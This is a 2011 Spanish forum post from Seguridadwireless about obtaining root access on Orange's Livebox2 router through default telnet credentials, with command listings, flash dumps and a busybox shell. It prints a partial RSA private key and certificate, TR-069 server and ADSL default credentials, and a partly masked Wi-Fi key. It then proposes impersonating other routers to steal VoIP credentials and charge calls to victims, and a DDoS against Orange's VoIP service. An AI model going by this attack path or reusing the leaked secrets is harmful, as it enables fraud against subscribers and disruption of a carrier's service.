Título: Seguridadwireless ha desbloqueado el router Livebox2 de Orange Publicado por: ChimoC en 23 Julio 2011, 09:31 am Seguridad Wireless desbloquea el router Livebox2 de Orange.
Todos los routers de Orange usan los mismos usuarios y contraseñas por defecto mediante conexion telnet, así que una vez hemos accedido al interior del router, podemos obtener esta información, y darnos permisos de superuser. La version original y la version actual del router Livebox2. Citar (version(4.0.21.3.3.1.32.1.1.1.6)) (external_version(FAST3yyy_691252)) (release(Jan 14 2010)) (distribution(LIC=/filer1_vol7/dev_projets3/rg_ultimate/dev/daniel/mini/OSP/4.3.23_691252/lastcheckout/license/jpkg_fast3202.lic DIST=FAST3202_SP_LBV2ULT)) (version(4.0.21.3.3.1.32.1.1.1.6)) (external_version(FAST3yyy_69127A)) (release(Apr 26 2011)) (distribution(LIC=/filer1_vol7/dev_projets3/rg_ultimate/dev/daniel/mini/OSP/4.3.48_BIS_691272/lastcheckout/license/jpkg_fast3202.lic DIST=FAST3202_SP_LBV2ULT)) Que conseguimos con esto: control total del router. ¿Y para que servirá esto? Vamos a ver un poquito la ayuda que ofrece el router: Citar [root @ home]$ help all Command Category terminal - Commands to control Livebox execution exit Exit sub menu ls List sub menu contents home Go back to home directory die Exit from Livebox and return ret ps Print Livebox's tasks entity_close Close an entity Command Category igmp - IGMP Proxy related commands igmp_status Print IGMP subscription of device igmp_reset Clear all IGMP subscriptions Command Category dns_route - Dyncamic Routing according to DNS replies dyn_route_print Print Dynamic Routes dyn_route_del Delete Dynamic Routes Command Category pvc - PVC scan related commands pvc_scan Scan predefined vpi.vci to determine PPP protocol pvc_scan_restart Restart PVC scan pvc_scan_status Display PVC scan status Command Category rg_conf - Read and write Livebox configuration data rg_conf_print Print Livebox configuration rg_conf_set Set Livebox configuration path to value rg_conf_set_obscure Set Livebox configuration path to an obscured value rg_conf_del Delete subtree from Livebox configuration rg_conf_ram_set Set Livebox dynamic configuration rg_conf_ram_print Print Livebox dynamic configuration rg_conf_ram_del Delete subtree from Livebox dynamic configuration reconf Reconfigure the system according to the current Livebox configuration Command Category ffs - Flash file system ffs_mount Mount FFS device ffs_umount Unmount FFS device ffs_format Format FFS device Command Category mii - MII Low level control mii_dev_link_status_get Get Link Status for all device ports using MII mii_phy_reg_get Get PHY MII register value mii_phy_reg_set Set PHY MII register value mii_eth_reg_get Get Ethernet MII register value mii_eth_reg_set Set Ethernet MII register value Command Category FT wlan commands - FT wlan commands wlan wlan Command Category FT commands - FT commands save Save configurating to flash flash_chksum Display all flash sections checksums Command Category FT adsl commands - FT adsl commands adsl adsl Command Category FT atm commands - FT atm commands atm atm Command Category FT sndcp commands - FT sndcp commands sndcp sndcp Command Category bluetooth_ssi - API for communication between OpenRG & Bluetooth hcid ssi_bluetooth_acl_check ssi_bluetooth_device_connected ssi_ctp_tl_connected ssi_ctp_tl_disconnected Command Category rmt_mng - Remote Management Commands rmt_mng_enable rmt_mng_login rmt_mng_add_user Command Category firewall - Control and display Firewall and NAT data fw_restart Stop and start Firewall & NAT fw_start Start Firewall & NAT fw_stop Stop Firewall & NAT fw_filter Turn Firewall packet inspection on/off mac_cache_dump Dump MAC cache data fw_dump Dispaly Firewall data fw_variable Display variables of the firewall rules fw_trace Trace packet traversal via the Firewall ruleset Command Category cmd - Commands related to the Command module help Commands Help Command Category tasks - API for Livebox tasks host Resolve host by name bridge_info Print bridge information vlan_add Add VLAN interface Command Category debug - Debug Livebox sys_ioctl issue openrg ioctl etask_list_dump Dump back trace of all etasks meminfo Print memory information Command Category log - Contorols Livebox logging behaviour cat_log Prints or deletes contents of log to console log_lev_on Redirect rg_error output equal to or higher than level to the current console. log_lev_off Stop rg_error redirection to the current console Command Category terminal - Commands to contorol Livebox execution exit Exit sub menu ls List sub menu contents home Go back to home directory die Exit from Livebox and return ret ps Print Livebox's tasks entity_close Close an entity Command Category main_task - main_task commands reboot Reboot the system rg_ifconfig List Livebox Network Devices cat Print file contents to console shell Spawn busybox shell in foreground restore_default Restore default configuration erase Restore default configuration exec Execute program print_main_wan Print the name of the current main wan device route Print route table ver Display version information date Print the current UTC and local time version Display version information for installation show Display version information for production Command Category flash - Flash and loader related commands flash_commit Save Livebox configuration to flash flash_erase Erase a given section in the flash load Load and burn image loadapp Load and burn image app1 or app2 boot Boot the system flash_layout Print the flash layout and content flash_dump Dump the flash content lock Lock mtd region unlock Unlock mtd region bset Configure bootloader ifconfig Configure network interface ping Test network connectivity Returned 0 Como podemos ver esta es toda la información de las opciones de configuración del router. Busquemos la clave wifi por defecto: Clave Wifi ( a fuego en el boot ) Citar [root @ home]$ flash_dump -s BOOT | -r 0x00018350 -l 0x00000020 00018350: 00 32 35 44 43 34 43 43 ** ** ** ** ** ** ** ** |.25DC4CC********| 00018360: ** ** ** ** ** ** ** ** ** ** ** 00 00 00 00 00 |***********.....| También se encuentra en el interior del router el archivo, el cual es el que carga a fuego, siempre que se resetea el router. Citar /etc # cat wsc_config.txt ####################################################### # VAP 1 config section ####################################################### # Simple Config Configuration File # Lines that start with # are treated as comments # Each line should not exceed 80 characters # Format: TYPE=value # START_OF_VAP_CONFIG_1 # Configured Mode: 1=Unconfigured AP, 2=Client, 3=Registrar, # 4=AP with Proxy, 5 = AP with Proxy and Registrar CONFIGURED_MODE=5 # Is the standalone Registrar (mode 3) wireless-enabled # Yes: 1, No:0 REGISTRAR_WIRELESS=1 # Should UPnP be used (for modes 1 and 3) # Yes: 1, No:0 USE_UPNP=0 UUID=0x00269***************** VERSION=0x10 DEVICE_NAME=Livebox2-4*** # Primary Device Categories: Please refer to the SC spec for # values for the following types PRI_DEV_CATEGORY=6 PRI_DEV_OUI=0x50f204 PRI_DEV_SUB_CATEGORY=1 # MAC Address of the local device, 6 byte value MAC_ADDRESS=0x0026******* MANUFACTURER=Sagem MODEL_NAME=Livebox2 MODEL_NUMBER=Livebox2 SERIAL_NUMBER=LK101***** # Config Methods: bitwise OR of values CONFIG_METHODS=0x188 # Auth type flags: bitwise OR of values AUTH_TYPE_FLAGS=0x20 # Encr type flags: bitwise OR of values ENCR_TYPE_FLAGS=0x8 CONN_TYPE_FLAGS=0x1 RF_BAND=1 OS_VER=0x80000000 FEATURE_ID=0x80000000 # SSID: # For unconfigured client: What it should connect to when # starting EAP-WSC # Example: SSID=WscSecureAP # For unconfigured AP: Initial broadcast SSID # Example: SSID=WscNewAP # For Registrar: SSID that the supplicant must connect to when # starting EAP-WSC # Example: SSID=WscNewAP # For AP with Registrar: Broadcast SSID # Example: SSID=WscSecureAP SSID=Orange-xxxx # Key Mgmt for Supplicant (Client, Registrar): # Unconfigured, doing WSC: WPA-EAP IEEE8021X # Configured after WSC (will be done by the s/w): WPA-PSK # Key Mgmt for Hostapd (AP, AP with Registrar): # Unconfigured, doing WSC: WPA-EAP # Configured after WSC (will be done by the s/w): WPA-PSK # Configured, plus Registrar: WPA-EAP WPA-PSK KEY_MGMT=WPA-EAP WPA-PSK # Are we using a USB key to transfer PIN/Credential? # Yes: 1, No:0 USB_KEY=0 # Is the Network Key set? # Yes: 0xValue or passphrase, No: comment out line # NW_KEY=0x000102030405060708090A0B0C0D0E0F000102030405060708090A0B0C0D0E0F # NW_KEY=passphrase NW_KEY=25DC4CC************** # DBG_LEVEL bit mask: 0:ERR, 1:INFO, 2:REG, 3:UPNP, 4:MC, 16:DBG DBG_LEVEL=7 END_OF_VAP_CONFIG_1 #OTHER_NETWORK_CONF ssid config filenames, separate by spaces OTHER_NETWORK_CONF=(null)END_OF_CONFIG Bloques de la flash. Citar [root @ home]$ flash_layout Flash layout: Section 00 Type BOOT Range 0x00000000-0x000A0000 MaxSize 0x000A0000 No more information. Section 01 Type AUTOCONF Range 0x000A0000-0x000C0000 MaxSize 0x00020000 No more information. Section 02 Type USER Range 0x000C0000-0x000E0000 MaxSize 0x00020000 No more information. Section 03 Type SCRATCH PAD Range 0x000E0000-0x00100000 MaxSize 0x0001FF6C Uninitialized. Section 04 Type USER Range 0x00100000-0x00120000 MaxSize 0x00020000 No more information. Section 05 Type FACTORY Range 0x00120000-0x00140000 MaxSize 0x0001FF6C Size 0x000004D3 Name 'FACTORY' Checksum 0x00010B81 Counter 0x00000001 Start Offset 0x00000000 Section 06 Type LAYOUT Range 0x00140000-0x00160000 MaxSize 0x0001FF6C Uninitialized. Section 07 Type CONF Range 0x00160000-0x00180000 MaxSize 0x0001FF6C Size 0x00003AA3 Name 'rg_conf' Checksum 0x001CF184 Counter 0x00000049 Start Offset 0x00000000 Section 08 Type CONF Range 0x00180000-0x001A0000 MaxSize 0x0001FF6C Size 0x000038CE Name 'rg_conf' Checksum 0x001BF4EC Counter 0x00000046 Start Offset 0x00000000 Section 09 Type JFFS Range 0x001A0000-0x00240000 MaxSize 0x000A0000 No more information. Section 10 Type RECOVERY Range 0x00240000-0x00580000 MaxSize 0x00340000 No more information. Section 11 Type IMAGE Range 0x00580000-0x01000000 MaxSize 0x00A80000 No more information. Total 12 sections found. Returned 0 Shell del Livebox. Citar [root @ home]$ shell BusyBox v1.01 (2005.09.07-07:38+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. / # ls automate dsp home mnt sys var bin etc hsdpa proc tmp dev fstab lib sbin usr / # help Built-in commands: ------------------- . : alias bg break cd chdir continue eval exec exit export false fg hash help jobs kill let local pwd read readonly return set shift times trap true type ulimit umask unalias unset wait Desbloqueo de paginas ocultas del router que proporcionan muchas más opciones de las que nos da originalmente Orange. Activación de todos los parametros de la configuración de las paginas. Citar (pages (hsiab(1)) (livezoom(1)) (visio(1)) (community(1)) (fax(1)) (telephone(1)) (tv(1)) (vpn(1)) (backuprestore(1)) (licence(1)) (log(1)) (lockunlock(1)) ) Activación de todos los parametros de la configuración de las redes. Citar (network (ftth(1)) (adsl(1)) (3g(1)) (pppoe(1)) (pppoa(1)) (dhcp(1)) (ftlock(1)) (h323(1)) (sip(1)) (tvrouted(1)) ) Activación de todos los parametros de la configuración de los servicios. Citar (services (rtcphone(1)) (universal_phone(1)) (multitv(1)) (professionnal(1)) (residential(1)) (testvoip(1)) (wifipushbutton(1)) (wifiwps(1)) (wpspushbutton(1)) (msgwaiting(1)) ) Activación de todos los parametros de la configuración del test. Citar (test (fmdev(1)) (sipdev(1)) ) Configuración de ADSL: (http://www.seguridadwireless.net/livebox/vpvc.jpg) Grabar y restaurar: (http://www.seguridadwireless.net/livebox/guardare.jpg) VPN: (http://www.seguridadwireless.net/livebox/vpnh.jpg) LOG: (http://www.seguridadwireless.net/livebox/logyr.jpg) FAX: (http://www.seguridadwireless.net/livebox/faxcj.jpg) COMUNIDAD LIVEBOX: (http://www.seguridadwireless.net/livebox/comunidadw.jpg) HOTSPOT: (http://www.seguridadwireless.net/livebox/hospot.jpg) LIVEZOOM: (http://www.seguridadwireless.net/livebox/livezoom.jpg) VIDEOTELEFONIA: (http://www.seguridadwireless.net/livebox/videotelefono.jpg) CONFIGURACION PPP: (http://www.seguridadwireless.net/livebox/shakespearelvb2.png) Ataques que se pueden realizar contra servidor Orange. Usurpación de usuario, tenemos los certificados públicos y privados del router (hay parte eliminadas para no comprometer la seguridad de Orange): Citar 00018740: 47 49 4e 20 52 53 41 20 50 52 49 56 41 54 45 20 |GIN RSA PRIVATE | 00018750: 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 49 43 58 51 49 |KEY-----.MIICXQI| 00018760: 42 41 41 4b 42 67 51 44 78 75 34 51 55 6b 56 4d |BAAKBgQDxu4QUkVM| 00018770: 31 57 31 58 30 61 71 38 49 48 59 58 71 53 35 33 |1W1X0aq8IHYXqS53| 00018780: 6c 71 36 51 4b 69 31 6a 73 30 65 66 57 42 67 6a |lq6QKi1js0efWBgj| 00018790: 43 6e 4a 55 63 30 72 4d 32 0a 70 70 67 77 77 57 |CnJUc0rM2.ppgwwW| 000187a0: 45 5a 36 35 45 31 54 4a 71 63 70 33 37 4e 6f 66 |EZ65E1TJqcp37Nof| 000187b0: 2b 4a 36 62 56 36 37 38 42 59 72 36 74 5a 56 2b |+J6bV678BYr6tZV+| 000187c0: 33 79 41 63 2b 61 56 6f 63 74 54 46 42 4f 4e 4c |3yAc+aVoctTFBONL| 000187d0: 31 71 57 6b 6f 62 65 57 78 59 0a 57 42 39 66 75 |1qWkobeWxY.WB9fu| 000187e0: 2b 7a 75 6d 71 44 30 65 73 79 65 34 58 6b 68 52 |+zumqD0esye4XkhR| 000187f0: 66 70 67 78 6a 35 63 61 41 75 76 76 6f 5a 51 70 |fpgxj5caAuvvoZQp| 00018800: 6d 7a 43 35 79 4e 74 58 47 6f 57 6c 7a 54 76 74 |mzC5yNtXGoWlzTvt| 00018810: 39 64 33 6f 51 49 44 41 51 41 42 0a 41 6f 47 41 |9d3oQIDAQAB.AoGA| 00018820: 45 75 77 45 75 4c 39 76 62 66 76 4b 54 4b 6d 56 |EuwEuL9vbfvKTKmV| 00018830: 4c 65 4e 78 75 68 64 56 4d 73 63 75 76 67 79 4f |LeNxuhdVMscuvgyO| 00018840: 56 32 74 4f 35 48 66 77 63 35 74 69 4b 4c 46 74 |V2tO5Hfwc5tiKLFt| 00018850: 69 64 65 63 6a 69 52 30 2f 31 78 72 0a 4c 32 72 |idecjiR0/1xr.L2r| 00018860: 68 70 32 57 4e 44 58 65 69 30 78 37 53 4c 39 39 |hp2WNDXei0x7SL99| 00018870: 59 68 52 69 72 4a 74 6f 2f 4b 70 43 62 73 66 35 |YhRirJto/KpCbsf5| 00018880: 51 79 65 52 71 58 4e 57 6f 61 6d 71 37 46 4a 79 |QyeRqXNWoamq7FJy| 00018890: 66 50 61 62 4c 32 38 79 4e 41 4e 46 49 0a 4e 52 |fPabL28yNANFI.NR| 000188a0: 42 54 50 38 6e 30 70 46 6f 78 51 50 52 50 6e 4e |BTP8n0pFoxQPRPnN| 000188b0: 33 58 65 4b 52 6d 58 47 67 4b 47 70 79 77 74 54 |3XeKRmXGgKGpywtT| 000188c0: 52 38 31 39 67 36 69 54 44 6b 48 4d 6b 43 51 51 |R819g6iTDkHMkCQQ| 000188d0: 44 2f 36 2f 68 74 30 4e 63 76 38 55 72 43 0a 5a |D/6/ht0Ncv8UrC.Z| 000188e0: 70 72 53 6b 47 6f 73 71 4e 4e 44 52 6e 39 36 47 |prSkGosqNNDRn96G| 000188f0: 76 55 33 7a 36 62 68 50 46 69 76 4c 30 37 54 38 |vU3z6bhPFivL07T8| 00018900: 44 6c 65 78 45 70 76 54 44 55 33 6a 49 67 77 59 |DlexEpvTDU3jIgwY| 00018910: 69 2f 66 6b 6c 79 41 2f 64 6c 54 55 48 67 2f 0a |i/fklyA/dlTUHg/.| 00018a90: 46 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 |F.-----END RSA P| 00018aa0: 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0a |RIVATE KEY-----.| ________________________________________ 00018f30: 00 00 00 00 00 00 00 00 00 2d 2d 2d 2d 2d 42 45 |.........-----BE| 00018f40: 47 49 4e 20 43 45 52 54 49 46 49 43 41 54 45 2d |GIN CERTIFICATE-| 00018f50: 2d 2d 2d 2d 0a 4d 49 49 43 2b 6a 43 43 41 65 4b |----.MIIC+jCCAeK| 00018f60: 67 41 77 49 42 41 67 49 50 54 45 73 78 4d 44 45 |gAwIBAgIPTEsxMDE| 00018f70: 79 4e 55 52 51 4d 6a 49 77 4d 7a 51 32 4d 41 30 |yNURQMjIwMzQ2MA0| 00018f80: 47 43 53 71 47 53 49 62 33 44 51 45 42 42 51 55 |GCSqGSIb3DQEBBQU| 00018f90: 41 4d 44 55 78 0a 43 7a 41 4a 42 67 4e 56 42 41 |AMDUx.CzAJBgNVBA| 00018fa0: 59 54 41 6b 5a 53 4d 51 34 77 44 41 59 44 56 51 |YTAkZSMQ4wDAYDVQ| 00018fb0: 51 44 45 77 56 54 51 55 64 46 54 54 45 57 4d 42 |QDEwVTQUdFTTEWMB| 00018fc0: 51 47 41 31 55 45 43 78 4d 4e 54 47 6c 32 5a 57 |QGA1UECxMNTGl2ZW| 00018fd0: 4a 76 65 43 42 54 0a 51 55 64 46 54 54 41 65 46 |JveCBT.QUdFTTAeF| 00018fe0: 77 30 78 4d 44 41 31 4d 44 55 78 4f 54 49 34 4d |w0xMDA1MDUxOTI4M| 00019360: 70 67 3d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 43 45 |pg==.-----END CE| 00019370: 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 00 |RTIFICATE-----..| Una vez tenemos esto podemos hacernos pasar por otro router ya que se comunican mediante el protocolo TR069. Cada vez que arranca el router este comunica con el servidor de Orange para obtener actualizaciones o configuración del proveedor SIP: http://karma-sip.orange.com:80/fr/parameter_request Las claves que usa se encuentran en: Citar /etc # cat parameters.txt ACS_URL string https://karma.orange.com/krmx69/es username string sage***** password string ca****** ConnectionRequestPort unsignedInt 50805 IGD_Mngt_ConnectionRequestURLPath string / ConnectionRequest_basic_auth_activate boolean 0 ConnectionRequest_digest_auth_activate boolean 1 ConnectionRequestBacklog unsignedInt 100 ConnectionRequestUsername string Default ConnectionRequestPassword string orange authrealm string gSOAP_Web_Service id string LIVEBOX_ID_ send_http_opaque boolean 1 Maxenvelopes unsignedInt 1 receive_timeout unsignedInt 20 PeriodicInformInterval unsignedInt 432000 PeriodicInformTime unsignedInt 0 nbr_max_connection_request unsignedInt 50 ConnectionRequestPeriod unsignedInt 3600 id_activate boolean 1 PeriodicInformEnable boolean 1 DownloadSleepDuration unsignedInt 25 autonome_mode boolean 0 with_certif_exchange boolean 1 client_pem string /etc/client.pem password_ssl string NULL cacert_pem string /etc/cacert.pem capath string NULL ssl_randfile string NULL comm_mode unsignedInt 2 /etc # Por lo tanto, nos podríamos hacer pasar por otro usuario, robarle los credenciales VOIP y llamar desde nuestro Smartphone a cualquier parte del mundo, cobrándole a la otra persona las llamadas. DDOS contra servidor Orange, modificamos el router para que este una vez dentro del server, haga, peticiones estúpidas contra el servidor y lo sature. Varios routers haciendo esto, dejarían sin servicio VOIP a Orange Formación del usuario hsdpa: XXXXXX-YYYYYYYYYYYYYYY@orangeBackup.net XXXXXX - principio de MAC de la pegatina. YYYYYYYYYYYYYYY - número de serie de la pegatina. @orangeBackup.net - terminación para todos. Datos de conexión ADSL Orange: Vpi : 8 Vci : 35 usuario : orangeuser@orangeadsl password : orangeuser123 Aplicación para windows. Proximamente ......... (http://www.seguridadwireless.net/livebox/liveunlocker.jpg) Aplicación para android. Proximamente ......... (http://www.seguridadwireless.net/livebox/liveunlocker2.jpg) Esperamos pronto podais disfrutar con moderación del control total de vuestro router Livebox2. Esto es solo el principio. Equipo : Estudio de Cifrados www.Seguridadwireless.net SeguridadWireless - Política de Publicación de Vulnerabilidades (http://www.seguridadwireless.net/avisolegal.php) |